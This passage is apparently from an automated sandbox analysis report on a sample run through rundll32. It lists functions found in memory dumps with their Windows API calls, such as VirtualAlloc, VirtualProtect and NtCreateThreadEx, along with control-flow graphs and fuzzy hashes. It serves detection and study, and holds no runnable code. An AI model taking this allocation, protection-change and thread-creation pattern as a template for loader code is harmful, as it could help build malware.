      control_flow_graph 349 4d322a8-4d322e2 350 4d322e6-4d3231c 349->350 350->350 351 4d3231e-4d3235d VirtualProtect 350->351 352 4d32361-4d3236d 351->352 355 4d31d18-4d31d20 352->355 355->355 356 4d31d22-4d31dec call 4d347a8 VirtualAlloc call 4d347a8 355->356 360 4d31df1-4d31e8a call 4d347a8 * 2 356->360 360->352
      APIs
      • VirtualAlloc.KERNEL32(?,?,?,?,?,-00000001,-00000001), ref: 04D31DAA
      • VirtualProtect.KERNEL32(?,00000800,?,?), ref: 04D3235A
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID: Virtual$AllocProtect
      • String ID:
      • API String ID: 2447062925-0
      • Opcode ID: e3d0b00510a6c716ea44dc0f727e4e475cbbcd87a214dbe7fa62648bb9f1230c
      • Instruction ID: cabdba12d09775de6694d35534ce1e40069147aa332734ca3e6efa9e5c6f1f97
      • Opcode Fuzzy Hash: e3d0b00510a6c716ea44dc0f727e4e475cbbcd87a214dbe7fa62648bb9f1230c
      • Instruction Fuzzy Hash: 4A61A1B26043418FD354CF29C844BAABBE6EBC5320F15CA6ED499CB3A1DB34D506CB51
      Function 0660F1F3 Relevance: 2.9, APIs: 1, Instructions: 1367COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: af6082df605ef423f6a591495e8b070252e7f204abbacca12acb5cfa1d5dd03c
      • Instruction ID: 028d529aaa84494d15fd7d51c77eec61a2470cafdf156d468499497323bd811f
      • Opcode Fuzzy Hash: af6082df605ef423f6a591495e8b070252e7f204abbacca12acb5cfa1d5dd03c
      • Instruction Fuzzy Hash: 07B2C6366183518FD778CE28C9C57DBF7E6BBC8310F198A3DD489DB284DA74A9058B81
      Function 06602790 Relevance: 1.9, APIs: 1, Instructions: 355libraryCOMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: LibraryLoad
      • String ID:
      • API String ID: 1029625771-0
      • Opcode ID: 0218d85dad2e021a5d5be0b55c3442357ee7efc2edda6de51b4e07b52941fb1f
      • Instruction ID: fec16bce1cf8685d7ed2eaaad44b94065782a4854809fc64f599fd53c1014e11
      • Opcode Fuzzy Hash: 0218d85dad2e021a5d5be0b55c3442357ee7efc2edda6de51b4e07b52941fb1f
      • Instruction Fuzzy Hash: BEF1A076D001298FDB24CF29C850BADB7B6FF89310F1581AAD409B7794D774AA86CF90
      Function 06624F10 Relevance: 1.7, APIs: 1, Instructions: 243registryCOMMON
      Download Yara Rule
      APIs
      • RegOpenKeyExW.KERNEL32(?,?,?,?,?), ref: 066250C4
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: Open
      • String ID:
      • API String ID: 71445658-0
      • Opcode ID: 95a671d22d9d17886cef8a2570fbb0e706f7ed5a7d9b86641912563606fbeb3a
      • Instruction ID: bb974cd0536de74ddc7facd1a3ca43675bf7eeb7c6d05ad606e794b629ded14a
      • Opcode Fuzzy Hash: 95a671d22d9d17886cef8a2570fbb0e706f7ed5a7d9b86641912563606fbeb3a
      • Instruction Fuzzy Hash: 80A1A7369086618FD724CF28C88465AF7E2BFC8310F16856DE999AB364DB30EC05CF81
      Function 0660C5E0 Relevance: 1.7, APIs: 1, Instructions: 231registryCOMMON
      Download Yara Rule
      APIs
      • RegQueryValueExW.KERNEL32(?,?,?,?,?,?), ref: 0660C871
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: QueryValue
      • String ID:
      • API String ID: 3660427363-0
      • Opcode ID: ec3b9969ba55457a074e4eab2ca4f63715ad237c09db28f2183b276895f1652a
      • Instruction ID: 006c378340133d4893d70c38cd7257825114a491c8c6a3f059311f4172386199
      • Opcode Fuzzy Hash: ec3b9969ba55457a074e4eab2ca4f63715ad237c09db28f2183b276895f1652a
      • Instruction Fuzzy Hash: FFA19F36A147408FD724CF28C880A6AB7E2FFC8310F568A2DE5959B364D731F906CB91
      Function 06602220 Relevance: 1.7, APIs: 1, Instructions: 215memoryCOMMON
      Download Yara Rule
      APIs
      • VirtualProtect.KERNEL32(?,?,?,?), ref: 06602400
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: ProtectVirtual
      • String ID:
      • API String ID: 544645111-0
      • Opcode ID: 15dc6c12d7e979e55322446972bdc9c8f4fab10e9133e25eb21e3efb49250773
      • Instruction ID: 464bfd2fe0470c0b8e2a0ebce680cfb7ee69575a56a2468fa86b426e8b7e71ff
      • Opcode Fuzzy Hash: 15dc6c12d7e979e55322446972bdc9c8f4fab10e9133e25eb21e3efb49250773
      • Instruction Fuzzy Hash: 3C915876E001189FDB14CFA9C84499EB7B7BF88314F6A816AD415BB345DB31AE46CF80
      Function 06606790 Relevance: 1.7, APIs: 1, Instructions: 215nativeCOMMON
      Download Yara Rule
      APIs
      • NtQueryDirectoryObject.NTDLL(?,?,?,?,?,?,?), ref: 066068F2
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: DirectoryObjectQuery
      • String ID:
      • API String ID: 1728361593-0
      • Opcode ID: da242fc9d4a44a311d8fa9c5f1d9b687644c76716baaec1ee4a56792fd08f05b
      • Instruction ID: d7bf5679a6ca3757a3cba02285da7aa01c5a8b0c079e7725f2887ea4daa6c8c8
      • Opcode Fuzzy Hash: da242fc9d4a44a311d8fa9c5f1d9b687644c76716baaec1ee4a56792fd08f05b
      • Instruction Fuzzy Hash: F4819F36A086518FE314CF29C84066BF7E3BBC8314F198A2DE9959B354DB71E816CB91
      Function 0660CD00 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: CloseFind
      • String ID:
      • API String ID: 1863332320-0
      • Opcode ID: 6d84ef1a72197c6040c77c5ed7aa744900656241686a233e61a2e97a9b76c94d
      • Instruction ID: a972dc2a46451d1104ca3502e84a3124782be4abadc17d6038e12fb1c89ba30d
      • Opcode Fuzzy Hash: 6d84ef1a72197c6040c77c5ed7aa744900656241686a233e61a2e97a9b76c94d
      • Instruction Fuzzy Hash: 03913D76E00619CFDB14CFA9C84059EFBB2BF88310F268269D415BB395D730A946CF90
      Function 04E5A660 Relevance: 1.7, APIs: 1, Instructions: 199memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 365 4e5a660-4e5a6d9 366 4e5a6df-4e5a702 365->366 367 4e5a704-4e5a716 366->367 368 4e5a6db-4e5a6dc 366->368 369 4e5a812-4e5a825 367->369 370 4e5a71c-4e5a747 367->370 368->366 371 4e5a74b-4e5a755 370->371 372 4e5a757-4e5a7a1 VirtualAllocExNuma 371->372 373 4e5a7a3-4e5a7ad 371->373 374 4e5a806-4e5a80c 372->374 375 4e5a7b5-4e5a7bf 373->375 376 4e5a7af-4e5a7b3 373->376 374->369 374->371 377 4e5a7c1-4e5a7cb 375->377 378 4e5a828-4e5a8f7 375->378 376->374 379 4e5a7e3-4e5a7ed 377->379 380 4e5a7cd-4e5a7e1 377->380 378->374 379->374 382 4e5a7ef-4e5a802 379->382 380->374 382->374
      APIs
      • VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?), ref: 04E5A78C
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID: AllocNumaVirtual
      • String ID:
      • API String ID: 4233825816-0
      • Opcode ID: bccee90482f3d822cd727697cb4d73832f475eaca5f31ed4075cd0be46bb443e
      • Instruction ID: a23071248f0d9bae1e24eebb91398c000d68fe8b89ed2cd84b94dc133ae583c1
      • Opcode Fuzzy Hash: bccee90482f3d822cd727697cb4d73832f475eaca5f31ed4075cd0be46bb443e
      • Instruction Fuzzy Hash: 1F71A0766182508FC718CF29D89466BB7E2FFC8314F158A2DE599C7360EB75E805CB81
      Function 04E5A900 Relevance: 1.7, APIs: 1, Instructions: 188memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 384 4e5a900-4e5a99d 385 4e5a99f-4e5a9b8 384->385 386 4e5a9ba-4e5a9cf 384->386 385->385 385->386 387 4e5a9d5-4e5a9ef 386->387 388 4e5aabe-4e5aad1 386->388 389 4e5a9f5-4e5a9ff 387->389 390 4e5aa05-4e5aa0f 389->390 391 4e5aa9f-4e5aab3 389->391 393 4e5aa15-4e5aa1e 390->393 394 4e5aa96-4e5aa9d 390->394 392 4e5aab6-4e5aab8 391->392 392->388 392->389 395 4e5aa20-4e5aa2a 393->395 396 4e5aa82-4e5aa94 393->396 394->392 397 4e5aa74-4e5aa7e 395->397 398 4e5aa2c-4e5aa72 VirtualProtect 395->398 396->392 399 4e5aa80 397->399 400 4e5aad2-4e5aba2 397->400 398->392 399->392 400->392
      APIs
      • VirtualProtect.KERNEL32(?,?,?,?), ref: 04E5AA5A
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID: ProtectVirtual
      • String ID:
      • API String ID: 544645111-0
      • Opcode ID: 15deada0825a71de3faa2d20ecbbbd8e5715a366ba8638a8c3e85bbc2090ba35
      • Instruction ID: b14975ea5ce77008eaf8a613c75ed64b3ab5f172088da22aa18ee235472ed054
      • Opcode Fuzzy Hash: 15deada0825a71de3faa2d20ecbbbd8e5715a366ba8638a8c3e85bbc2090ba35
      • Instruction Fuzzy Hash: 17718D766082518FC724CF29D88055BB7E2FFC8318F568A2DE8C997355EB30B906CB91
      Function 0660C3A0 Relevance: 1.7, APIs: 1, Instructions: 169registryCOMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: Close
      • String ID:
      • API String ID: 3535843008-0
      • Opcode ID: 5f8eaf98f79afd25ee21306e2592d579547c6d0ef75424336021dc7cdc2867bd
      • Instruction ID: 4d0d651df6d2e7be7a2910b3936b1aa097fc64bb8fc14bae68274a889bfb9e51
      • Opcode Fuzzy Hash: 5f8eaf98f79afd25ee21306e2592d579547c6d0ef75424336021dc7cdc2867bd
      • Instruction Fuzzy Hash: EB5193326087409FD748CE25D89092FB7E3BFC8320F55C62DE19587798DA74D815CB92
      Function 065FD53D Relevance: 1.7, APIs: 1, Instructions: 159COMMON
      Download Yara Rule
      APIs
      • DeviceIoControl.KERNEL32(?,?,?,?,?,?,?,?), ref: 065FD5E0
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: ControlDevice
      • String ID:
      • API String ID: 2352790924-0
      • Opcode ID: cc6f7223156317bb9874930efb9f67c545585e8fc5d49bad08b4f96be9167bc4
      • Instruction ID: 9dbfec6bd004177fc899a02cc68fe273fedd8bf516a8d612f73ba3b94de13122
      • Opcode Fuzzy Hash: cc6f7223156317bb9874930efb9f67c545585e8fc5d49bad08b4f96be9167bc4
      • Instruction Fuzzy Hash: 4A5191326182418FC314CF28C880AAAB7F3FFD9314F558A1DE69987654DB35E816CF52
      Function 04E52084 Relevance: 1.7, APIs: 1, Instructions: 157nativethreadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 403 4e52084-4e52085 404 4e52104-4e5210c 403->404 405 4e52087-4e520f4 NtCreateThreadEx 403->405 407 4e52160 404->407 408 4e5210e-4e52116 404->408 406 4e520f6-4e520ff 405->406 410 4e5205c-4e5205e 406->410 409 4e52163-4e52167 407->409 411 4e52142-4e5215b 408->411 412 4e52118-4e52120 408->412 409->410 413 4e52077-4e5207f 410->413 414 4e52060-4e52072 410->414 411->410 415 4e52122-4e5212a 412->415 416 4e5216c-4e521ca 412->416 413->403 414->409 415->410 417 4e52130-4e5213f 415->417 419 4e521d4-4e521fe 416->419 419->419 420 4e52200-4e52299 419->420 420->406
      APIs
      • NtCreateThreadEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?), ref: 04E520D8
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID: CreateThread
      • String ID:
      • API String ID: 2422867632-0
      • Opcode ID: 24ceb956e5bf62a7e138cf5b350d4aab77c8ff36057b925526ea7e3f0d51165c
      • Instruction ID: 4cf9b99c17d89bd3d045f77139862a0979e19118c9741bee5c7d77503b481412
      • Opcode Fuzzy Hash: 24ceb956e5bf62a7e138cf5b350d4aab77c8ff36057b925526ea7e3f0d51165c
      • Instruction Fuzzy Hash: D9612972A11129DFCB14CFA8DD416DEBBB2BF88314F168195D649BB210DB30AD85CF90
      Function 0660A5D6 Relevance: 1.7, APIs: 1, Instructions: 152registryCOMMON
      Download Yara Rule
      APIs
      • RegEnumKeyExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0660A600
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: Enum
      • String ID:
      • API String ID: 2928410991-0
      • Opcode ID: f990396587949cb153fedb5fe14909deda8134a0efc39bac05524446b0b68357
      • Instruction ID: 7c24b77a4f34e3806eac21678f32073fddfe476779458a316ec7b327712bc864
      • Opcode Fuzzy Hash: f990396587949cb153fedb5fe14909deda8134a0efc39bac05524446b0b68357
      • Instruction Fuzzy Hash: 97514B76E102198FDB54CFA9C940AAEBBB2FF88310F268169D519BB345D730A951CF90
      Function 06606CBB Relevance: 1.6, APIs: 1, Instructions: 142threadCOMMON
      Download Yara Rule
      APIs
      • CreateThread.KERNEL32(?,?,?,?,?,?), ref: 06606CFA
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: CreateThread
      • String ID:
      • API String ID: 2422867632-0
      • Opcode ID: 95f4ad5ca1adf209704b079f1363fcf34fd8d161a5df8f7f2972e5aaa3a69e16
      • Instruction ID: 0724b9e7f16dac1aa4e28b3dc0ab9f1ee179534cbe79f92a320c1e57ba75a8e3
      • Opcode Fuzzy Hash: 95f4ad5ca1adf209704b079f1363fcf34fd8d161a5df8f7f2972e5aaa3a69e16
      • Instruction Fuzzy Hash: 18512876E101199FDF54CFA8C841A9DBBB2FF88324F258169D519F7290DB30AD928F90
      Function 06622A81 Relevance: 1.6, APIs: 1, Instructions: 142fileCOMMON
      Download Yara Rule
      APIs
      • FindFirstFileW.KERNEL32(?,?), ref: 06622A9E
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: FileFindFirst
      • String ID:
      • API String ID: 1974802433-0
      • Opcode ID: 4047ccd1df7b02ee649c0434a1f8863fff4c4e00dab1f88195392208fce2c719
      • Instruction ID: 801e5c9c87f5267a97baf3161e9647d3a1659f2dbd17fba3bdf64764a4ab246f
      • Opcode Fuzzy Hash: 4047ccd1df7b02ee649c0434a1f8863fff4c4e00dab1f88195392208fce2c719
      • Instruction Fuzzy Hash: A451A472918661CFC760CF28C48069AB7F2FF99314F19896DE5989B355D335B902CF82
      Function 0660CB60 Relevance: 1.6, APIs: 1, Instructions: 136libraryCOMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: LibraryLoad
      • String ID:
      • API String ID: 1029625771-0
      • Opcode ID: a1f749d1228d12483d002b7ecf7afc12e468cc761eb6f660094fbeeb531b8d1a
      • Instruction ID: 176ac28767caa0934bec814811da78bc8e4b391b0abbd0cd087fd4ae22963b15
      • Opcode Fuzzy Hash: a1f749d1228d12483d002b7ecf7afc12e468cc761eb6f660094fbeeb531b8d1a
      • Instruction Fuzzy Hash: 6751F876E006188FDB58CFA9C94469EB7B6BF88210F268269D509BB355D730AD46CF80
      Function 06602625 Relevance: 1.6, APIs: 1, Instructions: 132threadCOMMON
      Download Yara Rule
      APIs
      • RtlExitUserThread.NTDLL(?), ref: 06602642
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: ExitThreadUser
      • String ID:
      • API String ID: 3424019298-0
      • Opcode ID: 0104faa69a9aac88046f498ef5555fdfa05ca6495ab1b725651d8e80769998d0
      • Instruction ID: 77fe6cdff05e4bb1195661e21c37a9992bf3f3b8dc3a128fab987eabdfc4bb0b
      • Opcode Fuzzy Hash: 0104faa69a9aac88046f498ef5555fdfa05ca6495ab1b725651d8e80769998d0
      • Instruction Fuzzy Hash: E9419132614A008FD368CF29D99491BB7F7BFD8320B158A2DE19687794DB34F816CB51
      Function 06610206 Relevance: 1.6, APIs: 1, Instructions: 131fileCOMMON
      Download Yara Rule
      APIs
      • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 06610248
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: CreateFile
      • String ID:
      • API String ID: 823142352-0
      • Opcode ID: f5ec28b149f4ac20a3ae90ec014871efbb31d72bb0b420416afe0af5a5cef663
      • Instruction ID: 63514e7e1c8926aa8796be268715f8d8614e3571cfa0edf27040596434edd635
      • Opcode Fuzzy Hash: f5ec28b149f4ac20a3ae90ec014871efbb31d72bb0b420416afe0af5a5cef663
      • Instruction Fuzzy Hash: A5519032A086419FD724CF28C990A5BB7E3BFC4310F198A1DE599DB254CB31E852CB82
      Function 0660D969 Relevance: 1.6, APIs: 1, Instructions: 129nativeCOMMON
      Download Yara Rule
      APIs
      • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0660D9A0
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: InformationQuerySystem
      • String ID:
      • API String ID: 3562636166-0
      • Opcode ID: 2f20fae7ce6d9e12b1e2a07e5868e5cfcd395fec26baaf9ed1a853910ded2808
      • Instruction ID: 4fab520631015bdf6bfc47267445864f2a06fbe2b4e8e8e91bdc043ad2ae15f8
      • Opcode Fuzzy Hash: 2f20fae7ce6d9e12b1e2a07e5868e5cfcd395fec26baaf9ed1a853910ded2808
      • Instruction Fuzzy Hash: 45512E36E001188FDF58CFA8C8A1AADBBB2FF84314F558199D14AA7254DB31AD86CF50
      Function 04D31EAF Relevance: 1.6, APIs: 1, Instructions: 302memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • VirtualAlloc.KERNEL32(?,?,?,?,?,-00000001,-00000001), ref: 04D31DAA
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 60cfc3169bd1d2215ac6e5c1fecdd99cf854f9d635ccf10514420de4cfbc4a31
      • Instruction ID: 9e79365bc6bd4cb853f0f0115fef029e09489dbce37a07e4d0eaf91776e4d9dd
      • Opcode Fuzzy Hash: 60cfc3169bd1d2215ac6e5c1fecdd99cf854f9d635ccf10514420de4cfbc4a31
      • Instruction Fuzzy Hash: C8B1D5B6A053408FC728CF2AC8957EAF7E6BFC9310F15862E949ECB354DB7499058B41
      Function 065FD090 Relevance: 1.5, APIs: 1, Instructions: 231memoryCOMMON
      Download Yara Rule
      APIs
      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 065FD262
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: a8a022706bec59e03830368abbac0ca58c29d356b1ca839a9a0c4c7365de563f
      • Instruction ID: b2af2f3a65e5b423730ff8415b5cd4d7ebc2762c3f0a6bbec790d636adaea55d
      • Opcode Fuzzy Hash: a8a022706bec59e03830368abbac0ca58c29d356b1ca839a9a0c4c7365de563f
      • Instruction Fuzzy Hash: 5DA12A76D112188FDB10CFA9C84069DFBB2FF98324F26815AD519BB345DB30A946CF80
      Function 0660E3E0 Relevance: 1.5, APIs: 1, Instructions: 211COMMON
      Download Yara Rule
      APIs
      • VirtualFree.KERNELBASE(?,?,?), ref: 0660E56F
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: FreeVirtual
      • String ID:
      • API String ID: 1263568516-0
      • Opcode ID: efac9e74aeef8ad33caa4d1855e26423e6f7e2dffa471e780b2ac220ef82b84d
      • Instruction ID: 465fef8407c7aecfe3022d9a914d7dca80e00460163be5f462e3c2f526d4d4cc
      • Opcode Fuzzy Hash: efac9e74aeef8ad33caa4d1855e26423e6f7e2dffa471e780b2ac220ef82b84d
      • Instruction Fuzzy Hash: 19818F76A086518FD355CF29C84055BB7E3BBC8310F2A8D2DE591E7394EA35F816CB82
      Function 06624C60 Relevance: 1.4, APIs: 1, Instructions: 180COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID: CloseHandle
      • String ID:
      • API String ID: 2962429428-0
      • Opcode ID: df8df8c803b639d2c883c5aa05b52be0735d0f209ef62e9e78b202865974b7e5
      • Instruction ID: 5b0971187fa1a3e2ed3f3814d8162c10f549239faabd6260d21d64fde741ad79
      • Opcode Fuzzy Hash: df8df8c803b639d2c883c5aa05b52be0735d0f209ef62e9e78b202865974b7e5
      • Instruction Fuzzy Hash: D961AD3A6187518FE314CF29C88062BB7E3BBC8714F268A1DE5959B754DB31E806CF81
      Function 04D31680 Relevance: 1.4, APIs: 1, Instructions: 168memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 443 4d31680-4d31cc2 445 4d31ce2-4d31cfd 443->445 446 4d31cc4 443->446 448 4d31d04-4d31d16 445->448 447 4d31cc6-4d31ce0 446->447 447->445 447->447 450 4d31d18-4d31d20 448->450 450->450 451 4d31d22-4d3236d call 4d347a8 VirtualAlloc call 4d347a8 * 3 450->451 451->448
      APIs
      • VirtualAlloc.KERNEL32(?,?,?,?,?,-00000001,-00000001), ref: 04D31DAA
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 3844c2bc1c125151e3a65f5664f705e6c7d18e1e64113b91be581051fd88fbf1
      • Instruction ID: 6664d94f3f35fba7f851af383bfead0bcf2c88274676eee0257c4858f69cb6c2
      • Opcode Fuzzy Hash: 3844c2bc1c125151e3a65f5664f705e6c7d18e1e64113b91be581051fd88fbf1
      • Instruction Fuzzy Hash: 3761AFB5A143408FD314CF29C844BABBBE6FBC9310F118A6EA499CB394DB34D906CB51
      Function 04E571D2 Relevance: 1.4, APIs: 1, Instructions: 140COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 461 4e571d2-4e57215 VirtualFree 462 4e57218-4e57221 461->462 463 4e57176-4e57178 462->463 464 4e5718e-4e57196 463->464 465 4e5717a-4e5718c 463->465 466 4e57243-4e5725b 464->466 467 4e5719c-4e571aa 464->467 465->463 466->463 468 4e57231-4e57240 467->468 469 4e571b0-4e571b8 467->469 470 4e57260-4e57363 469->470 471 4e571be-4e571c6 469->471 470->462 472 4e57226-4e5722c 471->472 473 4e571c8-4e571d0 471->473 472->463 473->461 473->463
      APIs
      • VirtualFree.KERNELBASE(?,?,?), ref: 04E571EF
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID: FreeVirtual
      • String ID:
      • API String ID: 1263568516-0
      • Opcode ID: afc1b4807ad34aa9e0bfe8a784944cf810ea806076dc0560b94a8b5171d245a1
      • Instruction ID: d55b204f2ef6e09ccd41f38f180b2ceb91b450766c22d4283ccdde9768bc4bed
      • Opcode Fuzzy Hash: afc1b4807ad34aa9e0bfe8a784944cf810ea806076dc0560b94a8b5171d245a1
      • Instruction Fuzzy Hash: 51511777E001198FCB14CFA8D9416DDB7B2FF98314F26819AD409B7210DB30BA928F90
      Function 04E51460 Relevance: .9, Instructions: 925COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 348612c32f1e5d903fd507d82f62253d58ffb455e3bd38ccaa9baf1aea483aaa
      • Instruction ID: 90047cee4dafcdcfdf88567a37a720c6da70be554cf91e355141fec2e73bbc71
      • Opcode Fuzzy Hash: 348612c32f1e5d903fd507d82f62253d58ffb455e3bd38ccaa9baf1aea483aaa
      • Instruction Fuzzy Hash: 1652D537B546214BD72CCE7DCC912AAF6D3ABC8310F1AD63E9989D7358DE74AC058680
      Function 06623C00 Relevance: .9, Instructions: 868COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
